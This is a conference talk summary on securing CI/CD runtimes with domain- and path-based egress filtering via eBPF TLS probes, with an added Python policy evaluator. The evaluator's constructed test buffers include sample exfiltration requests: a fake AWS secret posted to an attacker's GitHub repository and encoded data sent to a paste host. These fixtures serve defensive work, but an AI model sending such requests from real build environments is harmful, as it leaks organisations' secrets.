Securing CI/CD: Complexity & Inspiration from Runtime Security - Abhimanyu Dhamija, KoalaLab
The growth of software supply chain attacks has prompted a deeper look at the security of CI/CD. Build environments are prone to exfiltration of secrets and other sensitive data. This talk covers the lessons learned while building BOLT (https://github.com/koalalab-inc/bolt), an open-source tool that secures the CI runtime (for GitHub Actions). Taking inspiration from runtime security, enabling a firewall on the build-time/CI runtime is a good start; since the CI job is the source of the traffic, this firewall is an egress filter. Complexity 1: IP-based rules won't work. Much internet traffic sits behind CDNs and WAFs, whose IP addresses are shared and change, so the egress filter needs domain-name-based rules. Complexity 2: the CI runtime sends outbound traffic to multi-tenant systems such as GitHub, Docker Hub and JFrog, where an allowed hostname serves both the organization's own repositories and an attacker's, so the egress control needs deep inspection inside the TLS session (for example of the request path). Solution: TLS interception + eBPF. The Linux kernel's eBPF lets user-space probes hook the TLS library's read and write calls and observe the plaintext before it is encrypted, so the traffic can be inspected without decrypting it on the wire. Such a solution requires no changes from developers and is efficient. The talk also covers the implementation complexity of eBPF probing across the different TLS libraries a pipeline may use, which is needed to make the solution comprehensive for all kinds of CI pipelines.
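As an added example (not BOLT's code and not from the talk), the following Python policy evaluator applies the two constraints above to plaintext request buffers: rules are keyed by hostname rather than IP, and multi-tenant hosts get path-level rules that are only enforceable because the probe sees the request before encryption. The policy, the hostnames in it and the captured buffers are constructed for illustration; in a real deployment the buffers would come from a uprobe on the TLS library's write call.

```python
"""Egress policy evaluated on plaintext captured before TLS encryption.

Added example, not BOLT's code. It models the two complexities above:
  1. rules are keyed by hostname, not IP (CDN/WAF-fronted hosts share IPs);
  2. multi-tenant hosts need rules on the request path, which is visible
     only in the plaintext that a uprobe on the TLS library's write call
     hands back, never on the wire.
The capture buffers and the policy below are constructed for illustration.
"""
from dataclasses import dataclass, field
import fnmatch


@dataclass
class Rule:
    host: str                                                # exact host or "*.suffix" glob
    paths: list[str] = field(default_factory=lambda: ["*"])  # path globs; "*" = any path


@dataclass
class Decision:
    host: str
    path: str
    allowed: bool
    reason: str


def parse_request(plaintext: bytes) -> tuple[str, str, str]:
    """Return (method, target, host) from the HTTP/1.x request in a buffer."""
    head = plaintext.partition(b"\r\n\r\n")[0]
    lines = head.split(b"\r\n")
    parts = lines[0].decode("latin-1").split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError(f"not an HTTP/1.x request line: {lines[0]!r}")
    host = ""
    for line in lines[1:]:
        name, sep, value = line.decode("latin-1").partition(":")
        if sep and name.strip().lower() == "host":
            host = value.strip().lower().split(":")[0]  # drop an explicit port
            break
    if not host:
        raise ValueError("missing Host header")
    return parts[0], parts[1], host


def evaluate(plaintext: bytes, rules: list[Rule], default_allow: bool = False) -> Decision:
    """Apply the first rule whose host glob matches; fail closed by default."""
    try:
        method, target, host = parse_request(plaintext)
    except ValueError as err:
        return Decision("", "", default_allow, f"unparseable: {err}")
    path = target.split("?", 1)[0]  # the query string is not part of the policy
    for rule in rules:
        # fnmatch's "*" also matches ".", so an unanchored "*github.com" would
        # match "evilgithub.com"; keep host globs exact or "*."-prefixed.
        if not fnmatch.fnmatchcase(host, rule.host):
            continue
        if any(fnmatch.fnmatchcase(path, p) for p in rule.paths):
            return Decision(host, path, True, f"{method} matched {rule.host} {rule.paths}")
        return Decision(host, path, False, f"host allowed but path not in {rule.paths}")
    return Decision(host, path, default_allow, "no rule for host")


def run_policy(captures: list[bytes], rules: list[Rule]) -> list[Decision]:
    return [evaluate(buf, rules) for buf in captures]


# Hypothetical policy for an org that owns the "koalalab-inc" GitHub namespace.
POLICY = [
    Rule("github.com", ["/koalalab-inc/*", "/actions/*"]),
    Rule("*.githubusercontent.com"),
    Rule("registry-1.docker.io", ["/v2/library/*"]),
    Rule("auth.docker.io"),
]

# Constructed buffers shaped like the plaintext an SSL_write probe would see.
CAPTURES = [
    b"GET /koalalab-inc/bolt/releases HTTP/1.1\r\nHost: github.com\r\n\r\n",
    b"POST /attacker-org/drop/issues HTTP/1.1\r\nHost: github.com\r\n"
    b"Content-Length: 25\r\n\r\nAWS_SECRET=not-a-real-key",
    b"GET /v2/library/alpine/manifests/3.19 HTTP/1.1\r\nHost: registry-1.docker.io:443\r\n\r\n",
    b"GET /upload?d=c2VjcmV0 HTTP/1.1\r\nHost: paste.example.net\r\n\r\n",
]

if __name__ == "__main__":
    for d in run_policy(CAPTURES, POLICY):
        print("ALLOW" if d.allowed else "DENY ", d.host, d.path, "-", d.reason)
```

The second capture is the case an IP- or hostname-only filter cannot catch: github.com is allowed, but the request targets a repository outside the organization's namespace and carries a secret in its body, so the path rule denies it. The evaluator fails closed on anything it cannot parse as HTTP, which is what you want for a CI egress filter.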
Video: Securing CI/CD: Complexity & Inspiration from Runtime Security - Abhimanyu Dhamija, KoalaLab, from the OpenSSF channel
Video information
17 December 2024, 22:26:19
Duration: 00:12:16